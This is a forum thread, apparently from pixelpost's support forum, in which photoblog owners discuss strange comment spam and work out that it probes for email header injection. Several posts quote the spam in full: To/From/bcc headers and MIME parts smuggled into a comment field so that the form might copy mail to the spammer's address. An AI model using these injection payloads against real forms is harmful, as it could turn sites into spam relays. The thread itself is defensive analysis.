I'm getting a strange kind of comment spam where it seems to be spoofing a a fake email at my domain. The email notification I get of this comment is:

Hello,
A new comment has been made at your photoblog.

http://www.shadedpixel.net?showimage=pxtkuc@shadedpixel.n et


The Comment is:
----------------------------------------------------------------------
pxtkuc@shadedpixel.net
by pxtkuc@shadedpixel.net Content-Type: multipart/mixed; boundary=\\\"===============1616086776==\\\" MIME-Version: 1.0 Subject: ef88fe94 To: pxtkuc@shadedpixel.net bcc: mhkoch321@aol.com From: pxtkuc@shadedpixel.net This is a multi-part message in MIME format. --===============1616086776== Content-Type: text/plain; charset=\\\"us-ascii\\\" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit eihrxtrshz --===============1616086776==-- -
----------------------------------------------------------------------
Email Sent by pixelpost

These comments don't show up anywhere on my site, but I think there filling my database.

Anyone have any idea what this type of comment is doing, or howto stop it?

we must put that on our topic list, as I noticed one time before strange things like that and I even don't know what this should be..

we will have an eye on it..

I have seen this in my own photoblog. Essentially, the spammer tests the form in your pixelpost install to see if it will send an email to a different address other than the one you set when installing pixelpost. This is normally done to formmail installations (a CGI script for converting "contact us" forms in websites into an email sent to a nominated address), but the spammer mus t know of a vulnerability either in PHP or in pixelpost itself or he (it's a he for sure, heh!) is an idiot.

I am not saying that there is a vulnerability in pixelpost, but for pixelpost installs to be targetted there must be an exploit that is known out there for this idiot to go around trying people's comment forms. Essentially, where there is smoke, there is possibly a fire as well.

Here is the one that I got (site address has been changed to mysite.com)

NOTE:That there is the spammer's address which is bergkoch8@aol.com which is a test address to see if your comment form BCCs the message to his address.

http://www.mysite.com/?showimage=hpt@mysite.com
Content-Type: multipart/mixed; boundary="===============1854752306=="
MIME-Version: 1.0
Subject: 91035ff
To: hpt@mysite.com
bcc: bergkoch8@aol.com
From: hpt@mysite.com
This is a multi-part message in MIME format.

--===============1854752306==
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit

xcqwi
--===============1854752306==--
'>http://www.mysite.com/?showimage=hpt@mysite.com
Content-Type: multipart/mixed; boundary="===============1854752306=="
MIME-Version: 1.0
Subject: 91035ff
To: hpt@mysite.com
bcc: bergkoch8@aol.com
From: hpt@mysite.com

This is a multi-part message in MIME format.

--===============1854752306==
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit

xcqwi
--===============1854752306==--

Thank you for helping us to understand that

we will go into that for sure

I've started getting these as well, with the same BCC address. Is the mail making it out to this spammer's address? Are they able to use PixelPost's email code to send spam from our sites?

I have tested the same "sploit" (exploit) on my own photoblog (pixelpost 1.4.2) and it did not work. I tried changing the aol email address in the bcc into another email address of mine and it did not generate any email. All I can advice now is just grab a cup of coffee and relax while deleting the said comment.

There is, however, not a guarantee that this exploit will not develop and create a problem in the future, but we cannot fix a problem that does not exist yet. Try to google his email address and you will see that he has done this in many different places to many different types of php-based software.

well, the script indeed does just send one email to the administrator if he opted for getting email-notification on new comments

it won't do anything else

but this again shows that these stupid idiots try as most as they can to find out leaks etc.

If ever this creative would generate something positive... that would be good for all of us

but so, it's just negative creativity or energy...